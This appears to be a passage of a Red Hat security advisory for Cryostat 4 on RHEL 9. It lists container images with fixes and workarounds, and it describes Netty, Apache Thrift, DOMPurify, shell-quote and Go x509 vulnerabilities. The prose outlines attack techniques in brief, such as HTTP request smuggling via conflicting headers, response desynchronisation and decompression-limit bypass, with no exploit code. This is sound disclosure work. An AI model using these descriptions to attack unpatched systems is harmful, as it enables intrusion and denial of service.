| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Workaround
|
A flaw was found in Netty's HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Workaround
|
A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — | ||
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Workaround
|
A flaw was found in Apache Thrift. This vulnerability involves improper validation of a certificate with a host mismatch, which could allow a remote attacker to bypass security checks. By presenting a specially crafted certificate, an attacker may impersonate a legitimate server or client. This could lead to a security bypass, potentially enabling unauthorized access or information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:28010 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2456333 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461147 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2463410 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466660 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477217 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477224 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477226 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477232 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2480741 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-48431 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2463410 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-48431 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-48431 | external |
| http://www.openwall.com/lists/oss-security/2026/04/28/8 | external |
| https://lists.apache.org/thread/lb4j0zyd5f3g36cos… | external |
| https://access.redhat.com/security/cve/CVE-2026-9277 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2480741 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-9277 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-9277 | external |
| https://github.com/ljharb/shell-quote | external |
| https://github.com/ljharb/shell-quote/commit/1518179 | external |
| https://github.com/ljharb/shell-quote/security/ad… | external |
| https://www.npmjs.com/package/shell-quote | external |
| https://access.redhat.com/security/cve/CVE-2026-32281 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2456333 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-32281 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-32281 | external |
| https://go.dev/cl/758061 | external |
| https://go.dev/issue/78281 | external |
| https://groups.google.com/g/golang-announce/c/0uY… | external |
| https://pkg.go.dev/vuln/GO-2026-4946 | external |
| https://access.redhat.com/security/cve/CVE-2026-41240 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461147 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-41240 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-41240 | external |
| https://github.com/cure53/DOMPurify/commit/c361ba… | external |
| https://github.com/cure53/DOMPurify/releases/tag/3.4.0 | external |
| https://github.com/cure53/DOMPurify/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-42578 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477226 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42578 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42578 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477217 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42579 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42581 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477232 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42581 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42581 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42584 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477224 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42584 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42584 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42587 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42587 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-43869 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466660 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-43869 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-43869 | external |
| https://lists.apache.org/thread/3hsgl1b69wzq3ry39… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for the Red Hat build of Cryostat 4 on RHEL 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for the Red Hat build of Cryostat 4 on RHEL 9.\n\nSecurity Fix(es):\n\n* DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization (CVE-2026-41240)\n* crypto/x509: Denial of Service via inefficient certificate chain validation (CVE-2026-32281)\n* shell-quote: Arbitrary code execution via command injection due to unescaped line terminators (CVE-2026-9277)\n* Apache Thrift: Security bypass due to improper certificate validation (CVE-2026-43869)\n* Netty: High integrity impact due to improper DNS domain name constraint enforcement (CVE-2026-42579)\n* Netty: Incorrect HTTP response parsing leads to data confusion (CVE-2026-42584)\n* Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers (CVE-2026-42581)\n* Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation (CVE-2026-42578)\n* Netty: Denial of Service via unbounded memory allocation in HTTP content decompression (CVE-2026-42587)\n* Apache Thrift c_glib: Denial of Service via specially crafted requests (CVE-2025-48431)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:28010",
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2456333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456333"
},
{
"category": "external",
"summary": "2461147",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147"
},
{
"category": "external",
"summary": "2463410",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2463410"
},
{
"category": "external",
"summary": "2466660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466660"
},
{
"category": "external",
"summary": "2477217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477217"
},
{
"category": "external",
"summary": "2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "2477224",
